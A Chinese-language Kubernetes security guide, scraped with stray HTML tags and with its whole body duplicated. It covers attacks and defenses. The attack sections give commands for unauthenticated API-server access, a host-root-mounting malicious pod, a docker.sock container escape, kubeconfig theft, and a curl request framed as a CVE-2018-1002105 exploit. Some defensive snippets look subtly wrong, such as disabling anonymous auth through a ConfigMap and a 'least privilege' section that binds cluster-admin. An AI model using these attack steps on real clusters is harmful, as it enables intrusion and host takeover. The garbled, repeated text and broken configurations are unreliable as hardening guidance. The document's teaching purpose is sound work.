Kubernetes安全攻防指南：攻击手法与防御策略<\/h1>

一、Kubernetes架构与安全模型<\/h2>

1.1 Kubernetes核心组件<\/h3>

API Server<\/strong>：集群入口，处理所有REST请求<\/li>
etcd<\/strong>：分布式键值存储，保存集群配置数据<\/li>
kubelet<\/strong>：节点代理，管理Pod和容器<\/li>
kube-proxy<\/strong>：处理网络代理和负载均衡<\/li>
Controller Manager<\/strong>：维护集群状态（副本数、节点状态等）<\/li>

Scheduler<\/strong>：将Pod调度到合适节点<\/li> <\/ul>
1.2 Kubernetes安全模型<\/h3>

认证(Authentication)<\/strong>：<\/p>

客户端证书<\/li>
Bearer Token<\/li>
身份验证代理<\/li> <\/ul> <\/li>

授权(Authorization)<\/strong>：<\/p>

RBAC（基于角色的访问控制）<\/li>
ABAC（基于属性的访问控制）<\/li> <\/ul> <\/li>

准入控制(Admission Control)<\/strong>：<\/p>

Pod Security Policies<\/li>
请求预处理检查<\/li> <\/ul> <\/li>

网络策略(Network Policies)<\/strong>：<\/p>

控制Pod间网络通信<\/li>
定义入口\/出口规则<\/li> <\/ul> <\/li> <\/ul>
1.3 Kubernetes攻击面<\/h3>

攻击面<\/th> 具体组件\/区域<\/th> <\/tr> <\/thead>

控制平面<\/td> API Server、etcd、Controller Manager、Scheduler<\/td> <\/tr>
工作节点<\/td> kubelet、kube-proxy、容器运行时(Docker\/containerd)<\/td> <\/tr>
网络<\/td> Pod间通信、Service暴露、Ingress配置<\/td> <\/tr>
存储<\/td> PersistentVolume、PersistentVolumeClaim、Secrets<\/td> <\/tr>
供应链<\/td> 镜像仓库、CI\/CD流水线<\/td> <\/tr> <\/tbody> <\/table>
二、核心攻击手法与示例<\/h2>
2.1 API Server未授权访问<\/h3>
攻击原理<\/strong>：<\/p>

默认端口6443\/8080未启用身份验证<\/li>
旧版本K8s默认开放8080端口且无需认证<\/li> <\/ul>
攻击步骤<\/strong>：<\/p>

探测开放的API Server端口：<\/li> <\/ol>
curl -k https:\/\/<IP>:6443\/api\/v1\/namespaces\/default\/pods <\/span><\/span><\/code><\/pre> 使用kubectl直接管理集群：<\/li> <\/ol> kubectl -s http:\/\/<IP>:8080 get nodes # 列出所有节点<\/span> <\/span><\/span>kubectl -s http:\/\/<IP>:8080 create -f malicious-pod.yaml # 创建恶意Pod<\/span> <\/span><\/span><\/code><\/pre> 示例恶意Pod（挂载宿主机根目录）：<\/li> <\/ol> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: evil-pod<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> containers<\/span>: <\/span><\/span> - name<\/span>: nginx<\/span> <\/span><\/span> image<\/span>: nginx<\/span> <\/span><\/span> volumeMounts<\/span>: <\/span><\/span> - mountPath<\/span>: \/host<\/span> <\/span><\/span> name<\/span>: hostfs<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - name<\/span>: hostfs<\/span> <\/span><\/span> hostPath<\/span>: <\/span><\/span> path<\/span>: \/<\/span> <\/span><\/span><\/code><\/pre>2.2 Docker Socket挂载逃逸<\/h3> 攻击原理<\/strong>：<\/p> 容器内挂载\/var\/run\/docker.sock<\/li> 通过Docker API控制宿主机Docker守护进程<\/li> <\/ul> 攻击步骤<\/strong>：<\/p> 检查是否挂载docker.sock：<\/li> <\/ol> ls \/var\/run\/docker.sock <\/span><\/span><\/code><\/pre> 安装Docker客户端并与宿主机Docker通信：<\/li> <\/ol> apt-get update &&<\/span> apt-get install docker.io <\/span><\/span>docker -H unix:\/\/\/var\/run\/docker.sock ps <\/span><\/span><\/code><\/pre> 创建特权容器逃逸到宿主机：<\/li> <\/ol> docker -H unix:\/\/\/var\/run\/docker.sock run -it --privileged --net=<\/span>host -v \/:\/host ubuntu bash <\/span><\/span><\/code><\/pre>2.3 Kubeconfig文件泄露<\/h3> 攻击原理<\/strong>：<\/p> 获取包含认证信息的kubeconfig文件<\/li> 通常位于~\/.kube\/config或\/etc\/kubernetes目录<\/li> <\/ul> 攻击步骤<\/strong>：<\/p> 查找kubeconfig文件：<\/li> <\/ol> find \/ -name "kubeconfig"<\/span> 2>\/dev\/null <\/span><\/span>cat ~\/.kube\/config <\/span><\/span><\/code><\/pre> 使用泄露的kubeconfig访问集群：<\/li> <\/ol> export KUBECONFIG=<\/span>\/path\/to\/kubeconfig <\/span><\/span>kubectl get pods --all-namespaces <\/span><\/span><\/code><\/pre>2.4 历史漏洞利用<\/h3> CVE-2018-1002105<\/strong>：<\/p> 特权升级漏洞，允许通过API Server建立后端连接<\/li> 影响版本：Kubernetes v1.0.x-1.9.x, v1.10.0-1.10.10, v1.11.0-1.11.4<\/li> <\/ul> 利用方法<\/strong>：<\/p> curl -k -H "Connection: Upgrade"<\/span> -H "Upgrade: SPDY\/3.1"<\/span> -H "X-Stream-Protocol-Version: v2.example.com"<\/span> https:\/\/<API_SERVER>:6443\/api\/v1\/namespaces\/kube-system\/pods\/<etcd-pod>\/exec?command=<\/span>\/bin\/sh&input=<\/span>1&output=<\/span>1&tty=<\/span>1<\/span> <\/span><\/span><\/code><\/pre>三、防御策略<\/h2> 3.1 认证与授权加固<\/h3> 禁用匿名访问<\/strong>：<\/li> <\/ol> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: ConfigMap<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: kube-apiserver<\/span> <\/span><\/span> namespace<\/span>: kube-system<\/span> <\/span><\/span>data<\/span>: <\/span><\/span> anonymous-auth<\/span>: "false"<\/span> <\/span><\/span><\/code><\/pre> 启用RBAC<\/strong>：<\/li> <\/ol> kubectl apply -f - <<EOF <\/span><\/span><\/span>apiVersion: rbac.authorization.k8s.io\/v1 <\/span><\/span><\/span>kind: ClusterRoleBinding <\/span><\/span><\/span>metadata: <\/span><\/span><\/span> name: admin-binding <\/span><\/span><\/span>subjects: <\/span><\/span><\/span>- kind: User <\/span><\/span><\/span> name: admin <\/span><\/span><\/span> apiGroup: rbac.authorization.k8s.io <\/span><\/span><\/span>roleRef: <\/span><\/span><\/span> kind: ClusterRole <\/span><\/span><\/span> name: cluster-admin <\/span><\/span><\/span> apiGroup: rbac.authorization.k8s.io <\/span><\/span><\/span>EOF<\/span> <\/span><\/span><\/code><\/pre> 最小权限原则<\/strong>：<\/li> <\/ol> kubectl create role pod-reader --verb=<\/span>get,list --resource=<\/span>pods <\/span><\/span>kubectl create rolebinding pod-reader-binding --role=<\/span>pod-reader --user=<\/span>user1 <\/span><\/span><\/code><\/pre>3.2 网络防护<\/h3> 网络策略示例<\/strong>：<\/li> <\/ol> apiVersion<\/span>: networking.k8s.io\/v1<\/span> <\/span><\/span>kind<\/span>: NetworkPolicy<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: default-deny-all<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> podSelector<\/span>: {} <\/span><\/span> policyTypes<\/span>: <\/span><\/span> - Ingress<\/span> <\/span><\/span> - Egress<\/span> <\/span><\/span><\/code><\/pre> 限制Pod间通信<\/strong>：<\/li> <\/ol> apiVersion<\/span>: networking.k8s.io\/v1<\/span> <\/span><\/span>kind<\/span>: NetworkPolicy<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: allow-frontend-backend<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> podSelector<\/span>: <\/span><\/span> matchLabels<\/span>: <\/span><\/span> app<\/span>: frontend<\/span> <\/span><\/span> ingress<\/span>: <\/span><\/span> - from<\/span>: <\/span><\/span> - podSelector<\/span>: <\/span><\/span> matchLabels<\/span>: <\/span><\/span> app<\/span>: backend<\/span> <\/span><\/span><\/code><\/pre>3.3 运行时安全<\/h3> Pod安全策略<\/strong>：<\/li> <\/ol> apiVersion<\/span>: policy\/v1beta1<\/span> <\/span><\/span>kind<\/span>: PodSecurityPolicy<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: restricted<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> privileged<\/span>: false<\/span> <\/span><\/span> allowPrivilegeEscalation<\/span>: false<\/span> <\/span><\/span> requiredDropCapabilities<\/span>: <\/span><\/span> - ALL<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - 'configMap'<\/span> <\/span><\/span> - 'emptyDir'<\/span> <\/span><\/span> - 'projected'<\/span> <\/span><\/span> - 'secret'<\/span> <\/span><\/span> - 'downwardAPI'<\/span> <\/span><\/span> hostNetwork<\/span>: false<\/span> <\/span><\/span> hostIPC<\/span>: false<\/span> <\/span><\/span> hostPID<\/span>: false<\/span> <\/span><\/span> runAsUser<\/span>: <\/span><\/span> rule<\/span>: 'MustRunAsNonRoot'<\/span> <\/span><\/span> seLinux<\/span>: <\/span><\/span> rule<\/span>: 'RunAsAny'<\/span> <\/span><\/span> supplementalGroups<\/span>: <\/span><\/span> rule<\/span>: 'MustRunAs'<\/span> <\/span><\/span> ranges<\/span>: <\/span><\/span> - min<\/span>: 1<\/span> <\/span><\/span> max<\/span>: 65535<\/span> <\/span><\/span> fsGroup<\/span>: <\/span><\/span> rule<\/span>: 'MustRunAs'<\/span> <\/span><\/span> ranges<\/span>: <\/span><\/span> - min<\/span>: 1<\/span> <\/span><\/span> max<\/span>: 65535<\/span> <\/span><\/span><\/code><\/pre> 安全上下文配置<\/strong>：<\/li> <\/ol> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: security-context-demo<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> securityContext<\/span>: <\/span><\/span> runAsUser<\/span>: 1000<\/span> <\/span><\/span> runAsGroup<\/span>: 3000<\/span> <\/span><\/span> fsGroup<\/span>: 2000<\/span> <\/span><\/span> containers<\/span>: <\/span><\/span> - name<\/span>: sec-ctx-demo<\/span> <\/span><\/span> image<\/span>: busybox<\/span> <\/span><\/span> command<\/span>: [ "sh"<\/span>, "-c"<\/span>, "sleep 1h"<\/span> ] <\/span><\/span> securityContext<\/span>: <\/span><\/span> allowPrivilegeEscalation<\/span>: false<\/span> <\/span><\/span> capabilities<\/span>: <\/span><\/span> drop<\/span>: <\/span><\/span> - ALL<\/span> <\/span><\/span><\/code><\/pre>3.4 审计与监控<\/h3> 启用API Server审计<\/strong>：<\/li> <\/ol> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: ConfigMap<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: audit-policy<\/span> <\/span><\/span> namespace<\/span>: kube-system<\/span> <\/span><\/span>data<\/span>: <\/span><\/span> policy<\/span>: | <\/span><\/span><\/span> apiVersion: audit.k8s.io\/v1 <\/span><\/span><\/span> kind: Policy <\/span><\/span><\/span> rules: <\/span><\/span><\/span> - level: Metadata <\/span><\/span><\/span> resources: <\/span><\/span><\/span> - group: "" <\/span><\/span><\/span> resources: ["secrets", "configmaps"] <\/span><\/span><\/span> - level: RequestResponse <\/span><\/span><\/span> resources: <\/span><\/span><\/span> - group: "" <\/span><\/span><\/span> resources: ["pods"]<\/span> <\/span><\/span><\/code><\/pre> 部署Falco进行运行时监控<\/strong>：<\/li> <\/ol> helm install falco falcosecurity\/falco --set falco.jsonOutput=<\/span>true <\/span><\/span><\/code><\/pre>四、最佳实践总结<\/h2> 控制平面安全<\/strong>：<\/p> 定期更新Kubernetes版本<\/li> 禁用非安全端口(8080)<\/li> 启用API Server认证和授权<\/li> 配置etcd加密<\/li> <\/ul> <\/li> 节点安全<\/strong>：<\/p> 定期更新节点操作系统<\/li> 限制kubelet权限<\/li> 使用只读根文件系统<\/li> 禁用特权容器<\/li> <\/ul> <\/li> 工作负载安全<\/strong>：<\/p> 使用非root用户运行容器<\/li> 限制容器能力<\/li> 扫描镜像漏洞<\/li> 实施网络策略<\/li> <\/ul> <\/li> 持续安全<\/strong>：<\/p> 启用审计日志<\/li> 监控异常行为<\/li> 定期进行安全评估<\/li> 实施自动化安全检查<\/li> <\/ul> <\/li> <\/ol> 通过全面实施这些防御策略，可以显著提高Kubernetes集群的安全性，有效抵御常见的攻击手法。<\/p>

攻击面<\/th>	具体组件\/区域<\/th> <\/tr> <\/thead>
控制平面<\/td>	API Server、etcd、Controller Manager、Scheduler<\/td> <\/tr>
工作节点<\/td>	kubelet、kube-proxy、容器运行时(Docker\/containerd)<\/td> <\/tr>
网络<\/td>	Pod间通信、Service暴露、Ingress配置<\/td> <\/tr>
存储<\/td>	PersistentVolume、PersistentVolumeClaim、Secrets<\/td> <\/tr>
供应链<\/td>	镜像仓库、CI\/CD流水线<\/td> <\/tr> <\/tbody> <\/table> 二、核心攻击手法与示例<\/h2> 2.1 API Server未授权访问<\/h3> 攻击原理<\/strong>：<\/p> 默认端口6443\/8080未启用身份验证<\/li> 旧版本K8s默认开放8080端口且无需认证<\/li> <\/ul> 攻击步骤<\/strong>：<\/p> 探测开放的API Server端口：<\/li> <\/ol> curl -k https:\/\/<IP>:6443\/api\/v1\/namespaces\/default\/pods <\/span><\/span><\/code><\/pre> 使用kubectl直接管理集群：<\/li> <\/ol> kubectl -s http:\/\/<IP>:8080 get nodes # 列出所有节点<\/span> <\/span><\/span>kubectl -s http:\/\/<IP>:8080 create -f malicious-pod.yaml # 创建恶意Pod<\/span> <\/span><\/span><\/code><\/pre> 示例恶意Pod（挂载宿主机根目录）：<\/li> <\/ol> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: evil-pod<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> containers<\/span>: <\/span><\/span> - name<\/span>: nginx<\/span> <\/span><\/span> image<\/span>: nginx<\/span> <\/span><\/span> volumeMounts<\/span>: <\/span><\/span> - mountPath<\/span>: \/host<\/span> <\/span><\/span> name<\/span>: hostfs<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - name<\/span>: hostfs<\/span> <\/span><\/span> hostPath<\/span>: <\/span><\/span> path<\/span>: \/<\/span> <\/span><\/span><\/code><\/pre>2.2 Docker Socket挂载逃逸<\/h3> 攻击原理<\/strong>：<\/p> 容器内挂载\/var\/run\/docker.sock<\/li> 通过Docker API控制宿主机Docker守护进程<\/li> <\/ul> 攻击步骤<\/strong>：<\/p> 检查是否挂载docker.sock：<\/li> <\/ol> ls \/var\/run\/docker.sock <\/span><\/span><\/code><\/pre> 安装Docker客户端并与宿主机Docker通信：<\/li> <\/ol> apt-get update &&<\/span> apt-get install docker.io <\/span><\/span>docker -H unix:\/\/\/var\/run\/docker.sock ps <\/span><\/span><\/code><\/pre> 创建特权容器逃逸到宿主机：<\/li> <\/ol> docker -H unix:\/\/\/var\/run\/docker.sock run -it --privileged --net=<\/span>host -v \/:\/host ubuntu bash <\/span><\/span><\/code><\/pre>2.3 Kubeconfig文件泄露<\/h3> 攻击原理<\/strong>：<\/p> 获取包含认证信息的kubeconfig文件<\/li> 通常位于~\/.kube\/config或\/etc\/kubernetes目录<\/li> <\/ul> 攻击步骤<\/strong>：<\/p> 查找kubeconfig文件：<\/li> <\/ol> find \/ -name "kubeconfig"<\/span> 2>\/dev\/null <\/span><\/span>cat ~\/.kube\/config <\/span><\/span><\/code><\/pre> 使用泄露的kubeconfig访问集群：<\/li> <\/ol> export KUBECONFIG=<\/span>\/path\/to\/kubeconfig <\/span><\/span>kubectl get pods --all-namespaces <\/span><\/span><\/code><\/pre>2.4 历史漏洞利用<\/h3> CVE-2018-1002105<\/strong>：<\/p> 特权升级漏洞，允许通过API Server建立后端连接<\/li> 影响版本：Kubernetes v1.0.x-1.9.x, v1.10.0-1.10.10, v1.11.0-1.11.4<\/li> <\/ul> 利用方法<\/strong>：<\/p> curl -k -H "Connection: Upgrade"<\/span> -H "Upgrade: SPDY\/3.1"<\/span> -H "X-Stream-Protocol-Version: v2.example.com"<\/span> https:\/\/<API_SERVER>:6443\/api\/v1\/namespaces\/kube-system\/pods\/<etcd-pod>\/exec?command=<\/span>\/bin\/sh&input=<\/span>1&output=<\/span>1&tty=<\/span>1<\/span> <\/span><\/span><\/code><\/pre>三、防御策略<\/h2> 3.1 认证与授权加固<\/h3> 禁用匿名访问<\/strong>：<\/li> <\/ol> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: ConfigMap<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: kube-apiserver<\/span> <\/span><\/span> namespace<\/span>: kube-system<\/span> <\/span><\/span>data<\/span>: <\/span><\/span> anonymous-auth<\/span>: "false"<\/span> <\/span><\/span><\/code><\/pre> 启用RBAC<\/strong>：<\/li> <\/ol> kubectl apply -f - <<EOF <\/span><\/span><\/span>apiVersion: rbac.authorization.k8s.io\/v1 <\/span><\/span><\/span>kind: ClusterRoleBinding <\/span><\/span><\/span>metadata: <\/span><\/span><\/span> name: admin-binding <\/span><\/span><\/span>subjects: <\/span><\/span><\/span>- kind: User <\/span><\/span><\/span> name: admin <\/span><\/span><\/span> apiGroup: rbac.authorization.k8s.io <\/span><\/span><\/span>roleRef: <\/span><\/span><\/span> kind: ClusterRole <\/span><\/span><\/span> name: cluster-admin <\/span><\/span><\/span> apiGroup: rbac.authorization.k8s.io <\/span><\/span><\/span>EOF<\/span> <\/span><\/span><\/code><\/pre> 最小权限原则<\/strong>：<\/li> <\/ol> kubectl create role pod-reader --verb=<\/span>get,list --resource=<\/span>pods <\/span><\/span>kubectl create rolebinding pod-reader-binding --role=<\/span>pod-reader --user=<\/span>user1 <\/span><\/span><\/code><\/pre>3.2 网络防护<\/h3> 网络策略示例<\/strong>：<\/li> <\/ol> apiVersion<\/span>: networking.k8s.io\/v1<\/span> <\/span><\/span>kind<\/span>: NetworkPolicy<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: default-deny-all<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> podSelector<\/span>: {} <\/span><\/span> policyTypes<\/span>: <\/span><\/span> - Ingress<\/span> <\/span><\/span> - Egress<\/span> <\/span><\/span><\/code><\/pre> 限制Pod间通信<\/strong>：<\/li> <\/ol> apiVersion<\/span>: networking.k8s.io\/v1<\/span> <\/span><\/span>kind<\/span>: NetworkPolicy<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: allow-frontend-backend<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> podSelector<\/span>: <\/span><\/span> matchLabels<\/span>: <\/span><\/span> app<\/span>: frontend<\/span> <\/span><\/span> ingress<\/span>: <\/span><\/span> - from<\/span>: <\/span><\/span> - podSelector<\/span>: <\/span><\/span> matchLabels<\/span>: <\/span><\/span> app<\/span>: backend<\/span> <\/span><\/span><\/code><\/pre>3.3 运行时安全<\/h3> Pod安全策略<\/strong>：<\/li> <\/ol> apiVersion<\/span>: policy\/v1beta1<\/span> <\/span><\/span>kind<\/span>: PodSecurityPolicy<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: restricted<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> privileged<\/span>: false<\/span> <\/span><\/span> allowPrivilegeEscalation<\/span>: false<\/span> <\/span><\/span> requiredDropCapabilities<\/span>: <\/span><\/span> - ALL<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - 'configMap'<\/span> <\/span><\/span> - 'emptyDir'<\/span> <\/span><\/span> - 'projected'<\/span> <\/span><\/span> - 'secret'<\/span> <\/span><\/span> - 'downwardAPI'<\/span> <\/span><\/span> hostNetwork<\/span>: false<\/span> <\/span><\/span> hostIPC<\/span>: false<\/span> <\/span><\/span> hostPID<\/span>: false<\/span> <\/span><\/span> runAsUser<\/span>: <\/span><\/span> rule<\/span>: 'MustRunAsNonRoot'<\/span> <\/span><\/span> seLinux<\/span>: <\/span><\/span> rule<\/span>: 'RunAsAny'<\/span> <\/span><\/span> supplementalGroups<\/span>: <\/span><\/span> rule<\/span>: 'MustRunAs'<\/span> <\/span><\/span> ranges<\/span>: <\/span><\/span> - min<\/span>: 1<\/span> <\/span><\/span> max<\/span>: 65535<\/span> <\/span><\/span> fsGroup<\/span>: <\/span><\/span> rule<\/span>: 'MustRunAs'<\/span> <\/span><\/span> ranges<\/span>: <\/span><\/span> - min<\/span>: 1<\/span> <\/span><\/span> max<\/span>: 65535<\/span> <\/span><\/span><\/code><\/pre> 安全上下文配置<\/strong>：<\/li> <\/ol> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: security-context-demo<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> securityContext<\/span>: <\/span><\/span> runAsUser<\/span>: 1000<\/span> <\/span><\/span> runAsGroup<\/span>: 3000<\/span> <\/span><\/span> fsGroup<\/span>: 2000<\/span> <\/span><\/span> containers<\/span>: <\/span><\/span> - name<\/span>: sec-ctx-demo<\/span> <\/span><\/span> image<\/span>: busybox<\/span> <\/span><\/span> command<\/span>: [ "sh"<\/span>, "-c"<\/span>, "sleep 1h"<\/span> ] <\/span><\/span> securityContext<\/span>: <\/span><\/span> allowPrivilegeEscalation<\/span>: false<\/span> <\/span><\/span> capabilities<\/span>: <\/span><\/span> drop<\/span>: <\/span><\/span> - ALL<\/span> <\/span><\/span><\/code><\/pre>3.4 审计与监控<\/h3> 启用API Server审计<\/strong>：<\/li> <\/ol> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: ConfigMap<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: audit-policy<\/span> <\/span><\/span> namespace<\/span>: kube-system<\/span> <\/span><\/span>data<\/span>: <\/span><\/span> policy<\/span>: \| <\/span><\/span><\/span> apiVersion: audit.k8s.io\/v1 <\/span><\/span><\/span> kind: Policy <\/span><\/span><\/span> rules: <\/span><\/span><\/span> - level: Metadata <\/span><\/span><\/span> resources: <\/span><\/span><\/span> - group: "" <\/span><\/span><\/span> resources: ["secrets", "configmaps"] <\/span><\/span><\/span> - level: RequestResponse <\/span><\/span><\/span> resources: <\/span><\/span><\/span> - group: "" <\/span><\/span><\/span> resources: ["pods"]<\/span> <\/span><\/span><\/code><\/pre> 部署Falco进行运行时监控<\/strong>：<\/li> <\/ol> helm install falco falcosecurity\/falco --set falco.jsonOutput=<\/span>true <\/span><\/span><\/code><\/pre>四、最佳实践总结<\/h2> 控制平面安全<\/strong>：<\/p> 定期更新Kubernetes版本<\/li> 禁用非安全端口(8080)<\/li> 启用API Server认证和授权<\/li> 配置etcd加密<\/li> <\/ul> <\/li> 节点安全<\/strong>：<\/p> 定期更新节点操作系统<\/li> 限制kubelet权限<\/li> 使用只读根文件系统<\/li> 禁用特权容器<\/li> <\/ul> <\/li> 工作负载安全<\/strong>：<\/p> 使用非root用户运行容器<\/li> 限制容器能力<\/li> 扫描镜像漏洞<\/li> 实施网络策略<\/li> <\/ul> <\/li> 持续安全<\/strong>：<\/p> 启用审计日志<\/li> 监控异常行为<\/li> 定期进行安全评估<\/li> 实施自动化安全检查<\/li> <\/ul> <\/li> <\/ol> 通过全面实施这些防御策略，可以显著提高Kubernetes集群的安全性，有效抵御常见的攻击手法。<\/p>